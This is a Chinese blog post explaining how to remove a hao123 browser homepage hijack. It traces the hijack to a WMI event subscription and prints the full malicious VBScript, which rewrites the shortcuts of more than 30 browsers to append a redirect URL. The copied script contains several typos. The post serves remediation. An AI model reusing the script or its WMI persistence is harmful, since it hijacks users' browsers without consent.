谷歌浏览器设置启动页被hao123劫持_Chrome浏览器被hao123劫持,浏览器主页会被篡改为 hao123等...

最新推荐文章于 2023-04-04 16:47:22 发布
最新推荐文章于 2023-04-04 16:47:22 发布
阅读量349 收藏
点赞数
文章标签: 谷歌浏览器设置启动页被hao123劫持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39525097/article/details/111808077
版权

先放一个知乎帖子: https://www.zhihu.com/question/21883209

我就只放几个有效解决办法了,具体的可以看上边那个帖子

方案一:     删掉桌面上的chrome图标,打开安装文件夹找到chrome.exe,随便改成什么名字.exe,重新发送到桌面快捷方式,让恶意程序找不到chrome.exe

但其实上面的办法都治标不治本,并且千万不要下载什么 这管家那管家的,以毒攻毒吗

补充一种推荐的方案:

参考的这位大哥 - https://jing-luo.github.io/2017/03/DefeatYourBrowser/(别告我侵权)

以下内容基本照搬

主页被劫持的原理是一段通过WMI发起的定时自动运行脚本,WMI(Windows Management Instrumentation)可以理解成Windows系统后台运行的一个事件管理器。为查看WMI事件,先去下载WMITools并安装:WMI工具   WMI工具。

之后打开WMI Event Viewer:

点击左上角的笔的图标(Register For Events),在弹出的Connect to namespace的框直接点OK,Login的页面也直接点OK。点开左侧栏的EventFilter,再点击下级目录的项目:

在右侧栏右键点击ActiveScriptEventConsumer,并通过view instant properties查看属性:

在Script Text那一栏我们可以看到这段脚本:

On Error Resume Next

Const link= "http://hao.qquu8.com/?m=yx&r=j"Const link360= "http://hao.qquu8.com/?m=yx&r=j&s=3"browsers= "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"lnkpaths= "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\sjtul\Desktop,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\sjtul\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"browsersArr= split(browsers,",")

Set oDic= CreateObject("scripting.dictionary")

For Each browser In browsersArr

oDic.Add LCase(browser), browser

Next

lnkpathsArr= split(lnkpaths,",")

Set oFolders= CreateObject("scripting.dictionary")

For Each lnkpath In lnkpathsArr

oFolders.Add lnkpath, lnkpath

Next

Set fso= CreateObject("Scripting.Filesystemobject")

Set WshShell= CreateObject("Wscript.Shell")

For Each oFolder In oFolders

If fso.FolderExists(oFolder) Then

For Each file In fso.GetFolder(oFolder).Files

If LCase(fso.GetExtensionName(file.Path))= "lnk"Then

Set oShellLink=WshShell.CreateShortcut(file.Path)

path=oShellLink.TargetPath

name= fso.GetBaseName(path) & "." &fso.GetExtensionName(path)

If oDic.Exists(LCase(name)) Then

If LCase(name)= LCase("360se.exe") Then

oDicShellLink.Arguments=link360

Else

oShellLink.Arguments=link

End If

If file.Attributes And1Then

fsoile.Attributes= file.Attributes - 1End If

oShellLink.Save

End If

End If

Next

End If

Next

可以看到这是一段VBScript代码,攻击目标涵盖了包括Chrome、360、Firefox、搜狗等30余种常见的浏览器。脚本以浏览器的安装地址为切入点,创建WshShell对象,进而生成植入了流氓网站的快捷方式。360浏览器有限定主页格式,于是这段脚本还特地修饰了流氓网站的链接。

解决办法就是清除这段脚本:

直接在WMI Event Viewer中将_EventFilter.Name=”VBScriptKLive_filter”右键删掉会被系统拒绝掉

需要去WMI Event Viewer的安装位置,右键以管理员方式运行exe文件才能删掉。

      

(

之后还要把各个快捷方式都改回不带流氓网站的版本,包括桌面上的、开始菜单里的以及快速访问栏里的快捷方式,其中开始菜单里的快捷方式要去C:\ProgramData\Microsoft\Windows\Start Menu\Programs里改掉。

)

weixin_39525097
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Chrome谷歌浏览器被改为Hao123导航怎么办|附各类解决方法【转】-附件资源
03-05
Chrome谷歌浏览器被改为Hao123导航怎么办|附各类解决方法【转】-附件资源
关于IE浏览器Google Chrome浏览器主页hao123劫持
SpirItKay的专栏
08-08 1087
关于主页被劫持的原因有很多,最常见的木马劫持,还有快捷方式添加参数那种网上很多,这里我说一下自己遇到的状况,这次是无论快捷方式,甚至原应用程序,甚至注册表,启动项,都找遍,都没有异常,但是启动浏览器就是直接打开hao123浏览器和Internet设置怎样设置都没用。所以一定是进程监听的结果。 直接说结论,如果你有安装ADSafe净网大师,那么很有可能是它。就是这个设置项,导致浏览器总是指向
chrome 主页篡改成hao.qquu8.com的解决方案
weixin_34303897的博客
08-06 972
现象:刚用的win10, chrome固定于任务栏,每次点击任务栏启动时,都打开http://hao.qquu8.com/,然后跳转到hao123。修改了chrome的主页,还是不行。解决方案1:1.打开chrome浏览器2.右键,“从任务栏取消固定此程序”3.右键,“将此程序固定到任务栏”解决方案2:1.打开“文件资源管理器”, 在地址栏中输入“C:\Users\xxx...
谷歌浏览器hao123(或其他网劫持了,怎么办?(已解决)
热门推荐
qq_44231797的博客
03-05 1万+
关于谷歌浏览器chrome被hao123、2345、360等主页劫持和捆绑的解决方法
谷歌浏览器hao123网站劫持穿该怎么办【已解决】
小宝的博客
04-04 637
找到chrome的安装目录,C:\Program Files (x86)\Google\Chrome\Application把chrome.exe修改名字为其他任何名字,然后创建快捷方式到桌面,就可以正常打开了。病毒程序就是欺负chrome的安装路径太固定了导致的。
谷歌浏览器hao123霸占首的简单解决方法
qq_50898676的博客
07-07 6306
使用简单方法解决谷歌浏览器hao123霸占首的问题
谷歌浏览器设置启动hao123劫持_win10系统打开chromehao123劫持怎么办?解决方案...
weixin_39840606的博客
12-21 1107
有位win10系统用户最近遇到了一个问题,他反馈有次重启电脑后,好像某某浏览器升级了,然后打开chrome浏览器主页就被hao123劫持了,试了很多方法都没有作用。这是怎么回事呢?原来,win10下任务栏固定的图标是基于文件的,我们只要通过修改chrome快捷方式中的目标参数就能够把主页劫持去掉啦!Chrome浏览器Win10版下载v86.0.4240.183Chrome浏览器Win10版是谷歌...
浏览器hao123.com劫持解决办法
01-19
点击谷歌、火狐、百度、IE11等浏览器,全部自动打开流氓网站hao123.com,说明浏览器已被hao123.com劫持,请看解决办法。
浏览器hao123,hao524劫持的解决办法
01-03
解决办法: 1、修改快捷方式、在快捷方式上右击属性对话框手工删除网址的...2、加载了启动项的,在注册表、启动项、服务中搜索相关网址信息,找到后删除 3、使用wmitools工具删除wmi恶意代码 压缩包里包括wmitools软件
搜狗浏览器主页hao123篡改怎么办?.docx
09-27
搜狗浏览器主页hao123篡改怎么办?.docx
IE等浏览器快捷方式的主页hao123顽固劫持的解决办法
01-06
IE等浏览器快捷方式的主页hao123顽固劫持的解决办法。 可以直接清理被篡改主页。 已经使用火绒安全软件,检查无毒。
谷歌浏览器设置启动hao123劫持_解决Chrome浏览器主页hao123、360和2345篡改简单有效方法...
weixin_39654245的博客
12-21 2057
当你打开浏览器看到各种首跳转的面,对于强迫症的我是不能接受的!各种情况都碰到了,现在给出解决方法。按照下面的方式去排查就可以一定能解决你的问题,如果不行的话你来打我呀–!。如果问题解决了希望你能推荐给其他人。(提示:检查下杀毒软件有没有绑定浏览器主页。)方式一查看chrom浏览器的快捷方式后面是否有小尾巴,去掉就可以。如下:方式二查找到源程序位置,修改源文件的文件名。然后删除旧的快捷方式,重新...
Google Chrome主页hao123劫持解决办法
weixin_44970666的博客
02-21 5005
打开浏览器,自动弹出hao123界面,不是自己修改过的启动设置。 看过好些帖子,其中讲到的主要方法,对我都不管用: 1、在chrome快捷方式-属性-目标:检查文件路径,删除后面的hao123网址 我的后面没有url,此方法无效 2、重命名/重新创建chrome快捷方式: chrome快捷方式右击-打开文件所在位置-重命名chrome-发送到桌面快捷方式 无效 3、在地址栏输入chrome://version 修改命令行出现的hao123网址 没有相应网址,无效 最终找到的解决办法: 重置chrome浏
取消谷歌浏览器主页出现hao123
huang_hsk的博客
04-09 5061
取消谷歌浏览器主页出现hao123的方法 打开谷歌总是显示 hao123 ,强迫症受不了哈! 取消谷歌浏览器主页出现hao123的方法: 第一步打开浏览器 > 地址栏输入: chrome://settings/ 进入设置 > 选中 打开新标签 桌面右击浏览器图标 > 属性 >目标 在目标输入框中 最后添加(空格隔开,不然保存时提示错误): –flag-switches-begin --flag-switches-end http://XXXX.com/?r=gg
谷歌浏览器hao123绑定首
m0_37791204的博客
09-02 1869
以下仅为个人经历,仅供参考 1 打开谷歌浏览器,在地址栏中输入chrome://version 2 3 将命令号内容复制粘贴到下图位置 4 在最后放加上想要设定的网址 例如我要设置为百度: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --origin-tr...
Chrome浏览器hao123劫持的解决办法
weixin_43919445的博客
12-03 1万+
Chrome浏览器hao123劫持的解决办法 新电脑装程序,一般小心中招了,谷歌浏览器的首一直被劫持,打开浏览器自动跳到hao123。 网上找了不少办法最后一种才奏效。 1,腾讯管家的浏览器保护功能,锁定默认浏览器,锁定首到baidu,然并卵,问题依然。有人建议用更大的流氓360,没用过,作罢。 2,chrome浏览器搜索框输入 Chrome://version,命令行一栏,可以看到后缀有被劫持到的网址,复制之后去掉劫持网址,然后输入到chrome浏览器的属性-目标,再打开,问题依然。 3,最后用
谷歌浏览器设置启动hao123劫持_win10系统打开chrome主页hao123劫持的故障原因及解决方法...
weixin_39950010的博客
12-21 932
有位win10系统用户最近遇到了一个问题,他反馈有次重启电脑后,好像某某浏览器升级了,然后打开chrome主页就被hao123劫持了,试了很多方法都没有作用。这是怎么回事呢?下面脚本之家的小编带来相应的解决方法一起来看看吧!故障原因分析:win10下任务栏固定的图标是基于文件的,我们只要通过修改chrome快捷方式中的目标参数就能够把主页劫持去掉啦。解决方法:1、打开目录 C:\Users\用户...
2024-2030全球及中国PCB接触式探头行业研究及十五五规划分析报告.docx
最新发布
04-18
2024-2030全球及中国PCB接触式探头行业研究及十五五规划分析报告
解决Chrome浏览器主页hao123、360和2345篡改简单有效方法
06-13
很好的问题,以下是一些简单有效的方法: ...4. 卸载不必要的软件:有些软件自动将浏览器主页设置为指定的网址,如hao123、360和2345等,如果您不需要这些软件,可以卸载它们,以避免浏览器主页篡改

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值